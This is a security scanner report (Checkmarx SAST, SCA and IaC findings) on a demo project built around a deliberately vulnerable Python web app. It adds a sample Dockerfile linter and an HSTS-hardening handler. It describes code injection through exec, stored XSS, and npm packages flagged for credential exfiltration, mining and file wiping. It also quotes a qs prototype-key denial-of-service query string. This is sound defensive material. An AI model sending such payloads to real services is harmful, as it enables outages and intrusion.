Scan ID: 5bbab3d8-0efb-4e5c-ae07-05d01fb0fc13


Using <a href="%s" target="_blank"> at line 63 of /dsvw.py, without correctly setting the "rel" attribute, or disassociating the new window from its parent, is an unsafe way of opening a new window.

Result #1:
Severity: LOW
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. <a href=\"%s\" target=\"_blank\">: /dsvw.py[63,166]
    Review result in Checkmarx One: Unsafe_Use_Of_Target_blank

Result #2:
Severity: LOW
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. <a href=\"%s\" style=\"font-weight: bold; text-decoration: none; visited: blue; color: blue\" target=\"_blank\">: /dsvw.py[10,1046]
    Review result in Checkmarx One: Unsafe_Use_Of_Target_blank

Cxccd8b30c-808c @ Npm-scs-0.0.1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxccd8b30c-808c
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package was manually inspected by a security researcher and flagged as malicious

About

Classifying malicious packages is an internal process; analysis is done at scale automatically via multiple engines. Once there is a risk suspicion, it is forwarded to a security researcher for manual evaluation.

Attackers take advantage of the excessive trust in the open-source ecosystem and launch software supply chain attacks in the form of code packages.

The risk of having a package with a malicious payload is high. It is common for malicious payloads to execute themselves automatically upon installing or using the package.

While some dependency vulnerabilities may be kept as known issues for risk-management reasons, the same does not apply to a malicious package, which should be removed with the highest priority.


Additional Info

Cx0b915a4a-2d97 @ Npm-scs-0.0.1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx0b915a4a-2d97
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package downloads a harmful file.
File hash:
2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes each of the newly created files. In case a file is harmful, this risk is shown.



Additional Info

Unpinned Package Version in Apk Add @ /Dockerfile

Checkmarx (IaC-Security): Unpinned Package Version in Apk Add
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


Package version pinning reduces the range of versions that can be installed, reducing the chances of failure due to unanticipated changes

Locations:

Result #1:
Severity: MEDIUM
State: TO_VERIFY
Status: RECURRENT
    File: /Dockerfile[6,0]
    Expected value: RUN instruction with 'apk add ' should use package pinning form 'apk add ='
    Actual value: RUN instruction apk --no-cache add git python3 py-lxml && rm -rf /var/cache/apk/* does not use package pinning form
    Review result in Checkmarx One: Unpinned Package Version in Apk Add
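
Added example, not the project's Dockerfile or the Checkmarx IaC checker: a small Dockerfile linter that reproduces the three Dockerfile findings in this report (unpinned apk add, missing HEALTHCHECK, missing USER) and passes on a corrected file. The weak Dockerfile is constructed around the RUN line quoted in the finding; the base image, port, health-check command and the apk version pins in the fixed file are illustrative assumptions, not values taken from the repository.

```python
import re

# Constructed Dockerfile reproducing the report's findings. The RUN line is the
# one quoted above; everything else is assumed.
WEAK_DOCKERFILE = """\
FROM alpine:3.18
WORKDIR /app
COPY dsvw.py /app/
RUN apk --no-cache add git python3 py-lxml && rm -rf /var/cache/apk/*
EXPOSE 65412
CMD ["python3", "dsvw.py"]
"""

# Corrected version. The '=version' pins are placeholders for this example;
# take real ones from 'apk policy <pkg>' against the chosen base image.
FIXED_DOCKERFILE = """\
FROM alpine:3.18
WORKDIR /app
COPY dsvw.py /app/
RUN apk --no-cache add git=2.40.1-r0 python3=3.11.6-r0 py3-lxml=4.9.3-r1 \\
    && rm -rf /var/cache/apk/*
RUN adduser -D -H app
USER app
EXPOSE 65412
HEALTHCHECK --interval=30s --timeout=3s CMD wget -qO- http://127.0.0.1:65412/ || exit 1
CMD ["python3", "dsvw.py"]
"""

APK_ADD = re.compile(r"\bapk\b.*\badd\b(.*)")


def _instructions(dockerfile):
    """Yield (first_line_number, INSTRUCTION, arguments) for each logical line,
    joining backslash continuations and skipping blanks and comments."""
    pieces, start = [], None
    for lineno, raw in enumerate(dockerfile.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if start is None:
            start = lineno
        if line.endswith("\\"):
            pieces.append(line[:-1])
            continue
        pieces.append(line)
        text = " ".join(pieces)
        pieces, first = [], start
        start = None
        instr, _, args = text.partition(" ")
        yield first, instr.upper(), args


def lint_dockerfile(dockerfile):
    """Return [(line_number, message)]; line 0 marks file-level findings."""
    findings = []
    instrs = list(_instructions(dockerfile))
    names = {instr for _, instr, _ in instrs}
    for lineno, instr, args in instrs:
        if instr != "RUN":
            continue
        # Look at each shell command in the RUN separately.
        for cmd in re.split(r"&&|\|\||;", args):
            m = APK_ADD.search(cmd)
            if m is None:
                continue
            pkgs = [t for t in m.group(1).split() if not t.startswith("-")]
            unpinned = [p for p in pkgs if "=" not in p]
            if unpinned:
                findings.append((lineno, "unpinned apk add: " + " ".join(unpinned)))
    if "HEALTHCHECK" not in names:
        findings.append((0, "missing HEALTHCHECK"))
    if "USER" not in names:
        findings.append((0, "missing USER (container runs as root)"))
    return findings


if __name__ == "__main__":
    for lineno, message in lint_dockerfile(WEAK_DOCKERFILE):
        print("Dockerfile:%d: %s" % (lineno, message))
    print("fixed file findings:", lint_dockerfile(FIXED_DOCKERFILE))
```

Of the three, the missing USER instruction is the one with a security consequence: the command-injection and code-injection findings above would land a shell as root inside the container. Pinning and HEALTHCHECK are reproducibility and operability controls.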

Cxcc09496a-59c8 @ Npm-js-yaml-3.6.1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxcc09496a-59c8
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


js-yaml is vulnerable to Code Injection before 3.13.1. The load() function may execute arbitrary code injected through a malicious YAML file. Objects that have "toString" as key and JavaScript code as value are used as explicit mapping keys, this allows attackers to execute the supplied code through the load() function. The safeLoad() function is unaffected.


Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: HIGH
Availability impact: HIGH
Remediation Upgrade Recommendation: 3.13.1

Cx18e041aa-8a63 @ Npm-node-ipc-9.2.2

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx18e041aa-8a63
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


The malicious payload in this package has the ability to corrupt or destroy files on disk

About

File wiping or file destruction is a type of risk usually seen when attackers wish to cause harm. File destruction can be done in several ways such as:

  • Recursively overwriting all files with random / static content
  • Deleting all files
  • Encrypting all files and deleting the encryption key

Additional Info

Missing_HSTS_Header @ /dsvw.py

Checkmarx (SAST): Missing_HSTS_Header
Security Issue: Read More about Missing_HSTS_Header
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: 5bbab3d8-0efb-4e5c-ae07-05d01fb0fc13


The web-application does not define an HSTS header, leaving it vulnerable to attack.

Result #1:
Severity: MEDIUM
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. send_header: /dsvw.py[76,18]
    Review result in Checkmarx One: Missing_HSTS_Header
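
Added example, not code from dsvw.py: the send_header call the two Missing_HSTS_Header findings point at, in a minimal handler that sets Strict-Transport-Security on every response, plus a small checker for the header value. The handler, its response body and the max-age threshold are assumptions; the page itself only states that the header is absent.

```python
import http.server
import re
import threading
import urllib.request

# One year, with subdomains covered. Assumed policy for the example.
HSTS_VALUE = "max-age=31536000; includeSubDomains"


class HardenedHandler(http.server.BaseHTTPRequestHandler):
    """Minimal handler that sends HSTS on every response. Fronting it with TLS is
    assumed; browsers only honour the header when it arrives over HTTPS."""

    def do_GET(self):
        body = b"<html><body>ok</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Strict-Transport-Security", HSTS_VALUE)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the example quiet
        pass


def check_hsts(headers, min_age=31536000):
    """Return a list of problems with the HSTS header in a response header map;
    an empty list means it passes. Header-name lookup is case-insensitive."""
    value = next((v for k, v in headers.items()
                  if k.lower() == "strict-transport-security"), None)
    if value is None:
        return ["missing Strict-Transport-Security"]
    problems = []
    m = re.search(r"max-age=(\d+)", value, re.IGNORECASE)
    if m is None:
        problems.append("no max-age directive")
    elif int(m.group(1)) < min_age:
        problems.append("max-age below %d" % min_age)
    if "includesubdomains" not in value.lower():
        problems.append("includeSubDomains not set")
    return problems


def serve_once_and_fetch():
    """Start HardenedHandler on a loopback port, fetch '/', return its headers."""
    server = http.server.HTTPServer(("127.0.0.1", 0), HardenedHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        url = "http://127.0.0.1:%d/" % server.server_address[1]
        with urllib.request.urlopen(url) as resp:
            return dict(resp.headers.items())
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    headers = serve_once_and_fetch()
    print(headers.get("Strict-Transport-Security"))
    print("problems:", check_hsts(headers))
    print("weak policy:", check_hsts({"Strict-Transport-Security": "max-age=300"}))
```

The checker is the part worth keeping in a test suite: a header that is present but carries a max-age of a few minutes, or omits includeSubDomains, passes a "header exists" scan and still leaves first-visit and subdomain requests downgradable.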

Cx68e4da20-b53a @ Npm-ua-parser-js-0.7.29

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx68e4da20-b53a
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package exfiltrates stored credentials and sensitive information

About

Data exfiltration may be done in numerous ways such as through HTTP requests, DNS tunneling, various webhooks and more. It is common for attackers to try to exfiltrate sensitive information such as:

  • Credentials
  • Environment variables
  • SSH keys
  • Authentication tokens
  • Computer and operating system information
  • Network settings



Additional Info

Cxae9d1b09-2adb @ Npm-scs-0.0.1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxae9d1b09-2adb
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package executes a crypto mining software

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes network and filesystem activity. In case a crypto mining behavior is detected, this risk is shown.


Additional Info

Cxd55dbf56-4d06 @ Npm-scs-0.0.1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxd55dbf56-4d06
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package downloads a harmful file.
File hash:
ea131cc5ccf6aa6544d6cb29cdb78130feed061d2097c6903215be1499464c2e

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes each of the newly created files. In case a file is harmful, this risk is shown.


Additional Info

Stored_XSS @ /dsvw.py

Checkmarx (SAST): Stored_XSS
SAST - CWE: CWE-79
Test: test
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: feature/my-awesome-change
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT


The method do_GET embeds untrusted data in generated output with write, at line 80 of /dsvw.py. This untrusted data is embedded into the output without proper sanitization or encoding, enabling an attacker to inject malicious code into the generated web-page.

The attacker would be able to alter the returned web page by saving malicious data in a data-store ahead of time. The attacker's modified data is then read from the database by the do_GET method with connection, at line 26 of /dsvw.py. This untrusted data then flows through the code straight to the output web page, without sanitization. 

This can enable a Stored Cross-Site Scripting (XSS) attack.

Scan ID: 849ae697-ce7b-4bfd-8fe3-39c53ff6e3d4

Attack Vector

    1. connection: /dsvw.py[26,288]
    2. cursor: /dsvw.py[26,299]
    3. cursor: /dsvw.py[26,32]
    4. cursor: /dsvw.py[30,21]
    5. cursor: /dsvw.py[31,262]
    6. fetchall: /dsvw.py[31,269]
    7. join: /dsvw.py[31,166]
    8. format: /dsvw.py[31,160]
    9. content: /dsvw.py[31,21]
    10. content: /dsvw.py[78,71]
    11. content: /dsvw.py[80,41]
    12. format: /dsvw.py[80,38]
    13. encode: /dsvw.py[80,125]
    14. write: /dsvw.py[80,24]


Checkmarx One
Review in Checkmarx: Stored_XSS

Cx0a21eeca-49b1 @ Npm-scs-0.0.1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx0a21eeca-49b1
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package exfiltrates stored credentials and sensitive information

About

Data exfiltration may be done in numerous ways, such as through HTTP requests, DNS tunneling, various webhooks and more. It is common for attackers to try to exfiltrate sensitive information such as:

  • Credentials
  • Environment variables
  • SSH keys
  • Authentication tokens
  • Computer and operating system information
  • Network settings


Additional Info

Cx743605c8-a95e @ Npm-momnet-2.29.1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx743605c8-a95e
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


There is a weak link between the package's listed metadata and the referenced Git repository "https://github.com/moment/moment".

About

Package managers often display traction statistics per code package based on its related GitHub repository. These statistics help developers evaluate code packages.

The statistics displayed by the package managers do not go through any validation process. Because of how this information is acquired, it can easily be falsified to mislead developers.

As part of Checkmarx's package metadata analysis capabilities, the StarJacking engine verifies the authenticity of such Git repository references; in case it is a false reference, this risk is shown.


Additional Info

Cxfd197ca1-b64b @ Npm-momnet-2.29.1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxfd197ca1-b64b
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package was manually inspected by a security researcher and flagged as malicious

About

Classifying malicious packages is an internal process: analysis is done at scale automatically via multiple engines. Once there is a risk suspicion, it is forwarded to a security researcher for manual evaluation.

Attackers take advantage of the excessive trust in the open-source ecosystem and launch software supply chain attacks in the form of code packages.

The risk of having a package with a malicious payload is high. It is common behavior for most malicious payloads to execute automatically upon installing or using the package.

While some dependency vulnerabilities may be kept as known issues as a risk-management decision, the same does not apply to a malicious package: it should be removed with the highest priority.


Additional Info

Cxec49316b-56df @ Npm-js-yaml-3.6.1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxec49316b-56df
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


The package js-yaml before 3.13.0 is vulnerable to Denial of Service, as the function storeMappingPair() in file lib/js-yaml/loader.js does not limit the user-supplied YAML, causing the map key to grow exponentially and produce a huge amount of output data, leading to denial of service due to excessive memory usage. This affects availability.


Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: NONE
Availability impact: HIGH
Remediation Upgrade Recommendation: 3.13.1

Multiple RUN, ADD, COPY, Instructions Listed @ /Dockerfile

Checkmarx (KICS): Multiple RUN, ADD, COPY, Instructions Listed
Applications: App1, App2
Checkmarx Project: My-Test-Org/My-Repo-Name
Repository URL: https://github.com/hmmachadocx/small-project.git
Branch: main
Severity: LOW
State: TO_VERIFY
Status: NEW


Multiple commands (RUN, ADD, COPY) should be grouped in order to reduce the number of layers.

Scan ID: 853146fc-fdfe-41da-acda-485e520b7041

Expected value: The 'Dockerfile' contains any 'USER' instruction
Actual value: The 'Dockerfile' does not contain any 'USER' instruction


Checkmarx One
Review in Checkmarx: Multiple RUN, ADD, COPY, Instructions Listed

CVE-2022-24999 @ Npm-qs-6.0.0

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2022-24999
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


The qs package as used in Express through 4.17.3 and other products, allows attackers to cause a Node process hang for an Express application because a "__proto__" key can be used. In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as "a[proto]=b&a[proto]&a[length]=100000000". This vulnerability affects qs versions through 6.2.3, 6.3.0 through 6.3.2, 6.4.0, 6.5.0 through 6.5.2, 6.6.0, 6.7.0 through 6.7.2, 6.8.0 through 6.8.2, 6.9.0 through 6.9.6 and 6.10.0 through 6.10.2 (and therefore Express 4.17.3, which has "deps: [email protected]" in its release description, is not vulnerable).


Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: NONE
Availability impact: HIGH
Remediation Upgrade Recommendation: 6.2.4

Code_Injection @ /dsvw.py

Checkmarx (SAST): Code_Injection
Security Issue: Read More about Code_Injection
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: 5bbab3d8-0efb-4e5c-ae07-05d01fb0fc13


The application's do_GET method receives and dynamically executes user-controlled code using exec, at line 57 of /dsvw.py. This could enable an attacker to inject and run arbitrary code.

The attacker can inject the executed code via user input, get, which is retrieved by the application in the do_GET method, at line 56 of /dsvw.py.

Result #1:
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. get: /dsvw.py[56,268]
    2. "HTTP_USER_AGENT": /dsvw.py[56,236]
    3. envs: /dsvw.py[56,50]
    4. envs: /dsvw.py[57,35]
    5. exec: /dsvw.py[57,21]
    Review result in Checkmarx One: Code_Injection

Cxc73fdf59-ac18 @ Npm-ua-parser-js-0.7.29

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxc73fdf59-ac18
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e


This package downloads a harmful file.
File hash:
2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes each of the newly created files. In case a file is harmful, this risk is shown.


Additional Info
